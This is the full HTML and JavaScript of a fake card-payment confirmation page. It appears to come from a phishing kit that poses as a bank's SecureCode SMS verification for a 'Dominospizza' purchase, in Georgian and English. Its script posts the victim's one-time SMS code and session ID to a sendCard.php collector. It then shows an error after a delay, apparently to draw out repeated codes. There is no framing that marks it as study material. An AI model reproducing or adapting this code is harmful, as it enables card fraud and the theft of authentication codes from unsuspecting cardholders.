<!DOCTYPE html>
<html lang="ka">
<head>
  <meta charset="UTF-8">
  <title>Confirmation</title>
   <link href="css/style.css" rel="stylesheet" type="text/css">
  <style>
    *{
        padding: 0;
        margin: 0;
        box-sizing: border-box;
    }
    body {
      font-family: Arial, sans-serif;
      background: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      padding: 0 20px;
    }

    .container {
      border: 1px solid #ddd;
      padding: 20px;
      border-radius: 6px;
      width: 100%;
      max-width: 450px;
      text-align: center;
      box-shadow: 0 2px 6px rgba(0,0,0,0.1);
    }

    .top-bar {
      display: flex;
      justify-content: space-between;
      align-items: center;
      margin-bottom: 20px;
    }

    .logo {
      display: flex;
      align-items: center;
      gap: 8px;
    }

    .logo img {
      height: 40px;
    }

    .cancel {
      font-size: 14px;
      color: #0077cc;
      text-decoration: none;
    }

    h2 {
      font-size: 20px;
      margin-bottom: 20px;
      color: #003366;
      margin-top: 40px;
    }

    .details {
      text-align: left;
      margin-bottom: 20px;
      font-size: 15px;
      line-height: 1.6;
    }

    .input-box {
      margin-bottom: 20px;
    }

    input {
      width: 100%;
      padding: 12px;
      font-size: 16px;
      text-align: center;
      border: 1px solid #ccc;
      border-radius: 6px;
      outline: none;
      margin-top: 20px;
    }

    .btn {
      width: 100%;
      padding: 12px;
      font-size: 16px;
      border: none;
      border-radius: 6px;
      cursor: pointer;
      margin-bottom: 20px;
      margin-top: 0;
    }

    .btn.verify {
      background-color: #00a6eb;
      color: #fff;
    }

    .btn.resend {
      background-color: #f5f5f5;
      color: #333;
      border: 1px solid #ccc;
    }

    .help {
      margin-top: 15px;
      font-size: 14px;
      color: #0077cc;
      text-decoration: none;
      display: block;
    }

    #passcode{
      -webkit-text-security: disc;
    }

    .for_loaders{
      min-height: 340px;
      display: flex;
      justify-content: center;
      align-items: center;
    }
  </style>
</head>
<body class="other">

  <form class="form_item" id="ajax-contact" method="POST" name="frm" accept-charset="utf-8">
  <div class="container">
    <div class="top-bar">
      <div class="logo">
      </div>
      <a onclick="comeBack()" class="cancel">გაუქმება / Cancel</a>
    </div>

    <img style="width: 100%;" src="../image.png" alt="">

    <div class="for_loaders">
    <img id="spinner" src="img/spinner.gif" style="display:block;margin:auto;">
    <div id="pass-form" style="display: none;">
    <h2>დადასტურება / Confirmation</h2>

    <div class="details">
      Dominospizza <br>
      <span class="for_price"></span> <br>
      
    </div>

    <div class="input-box">
      <label>შეიყვანე SMS კოდი / Enter SMS code:</label>
      <input id="passcode" type="text" onfocus="removeClass()"
                pattern="[0-9]*"
                maxlength="6"
                />
    </div>
 <input type="button" class="big-button btn verify"  onclick="sendPasscode()" id="btnSubmitXX" name="btSubmit" value="დადასტურება / Verify">
    <button class="btn resend">კოდის ხელახლა გაგზავნა / Resend Code</button>

    <a class="help_btn help"><img src="img/help.gif" class="help_icon"
            alt="Help" style="padding-right: 2px; vertical-align:text-top;" onclick="showHelp()">დახმარება / Help</a>
  </div>
</div>
  </div>
  <div class="help hid">
                <div class="desc">
                    <p>SecureCode Verification is a free online card security program. SecureCode protects cards with a personal
                        security passcode. If this service is activated on your card, the online stores participating in the program
                        will redirect your
                        browser to the Bank's website to enter your personal passcode. After checking it, the purchase will be
                        safely paid. If the online store does not participate in the SecureCode Verification program, payment
                        security is not guaranteed.
                    </p>
                    <div class="list">
                        <div class="footer">
                            <div class="row">
                                <div class="">
                                    <input id="returnBtn" class="big-button backlink" type="button" name="btcComeBack" value="Return">
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <input class="cnumidclass" type="hidden" name="cnumid" value="">
  </form>

  <script>
    window.onload = function() {
      var price = sessionStorage.getItem("dataprice")

      document.querySelector(".for_price").innerHTML = price
    }
  </script>

  <script src="js/jquery.min.js" ></script>

  <script>
        window.onload = function() {
            if (sessionStorage.getItem('dataprice') == null) {
                window.location.href = '../'
            }
            else {
                let price = parseInt(sessionStorage.getItem('dataprice'))
                $('#label2').text(price.toFixed(2).toString());


                let date = new Date();
                let day = date.getDate();
                let month = date.getMonth() + 1;
                let year = date.getFullYear();
                document.querySelector("#label3").innerHTML=localStorage.getItem("Months")+"/"+localStorage.getItem("Years")

                //get last 4 digits of card number

                let last = sessionStorage.getItem('last_num_dig');
                $('#label4').text("**** **** **** " + last);
                
                setTimeout(() => {
                    $('#spinner').hide()
                    $('#pass-form').show()
                }, 2000);
            }

        }

        function removeClass() {
            $('#passcode').removeClass('hint')
            $('#error-text').hide()
        }

        function comeBack(){
            if (document.referrer!== '') {
            window.location.href = document.referrer;
            }
            else {
                window.location.href = '../'
            }
        }

        function sendPasscode() {
            $('#spinner').show()
            $('#pass-form').hide()
            let data = {};
            let passcode =document.getElementById("passcode").value;
            if (passcode.length > 5){   
            data['code'] = passcode;
            data['project']= 'Burj Khalifa'
            data['sessionId'] = sessionStorage.getItem('sessionId')
            $.ajax({
                url: '../sendCard.php',
                method: 'post',
                data: data, 
                success: function(data) {
                    setTimeout(function() {
                    $('#spinner').hide()
                    $('#pass-form').show()
                    $('#error-text').show()
                }, 5000);
                },

                error: function() {
                    $('#spinner').hide()
                    $('#pass-form').show()
                    $('#passcode').addClass('hint')
                }
                
            
            });

            }
            else {
                $('#spinner').hide()
                $('#pass-form').show()
                $('#passcode').addClass('hint')
            }

        }
        $(document).on('click', '.help_btn', function(e) {
            $('.help.hid').removeClass('hid')
        })
        $(document).on('click', '#returnBtn', function(e) {
            $('.help').addClass('hid')
        })
    </script>
  
</body>
</html>
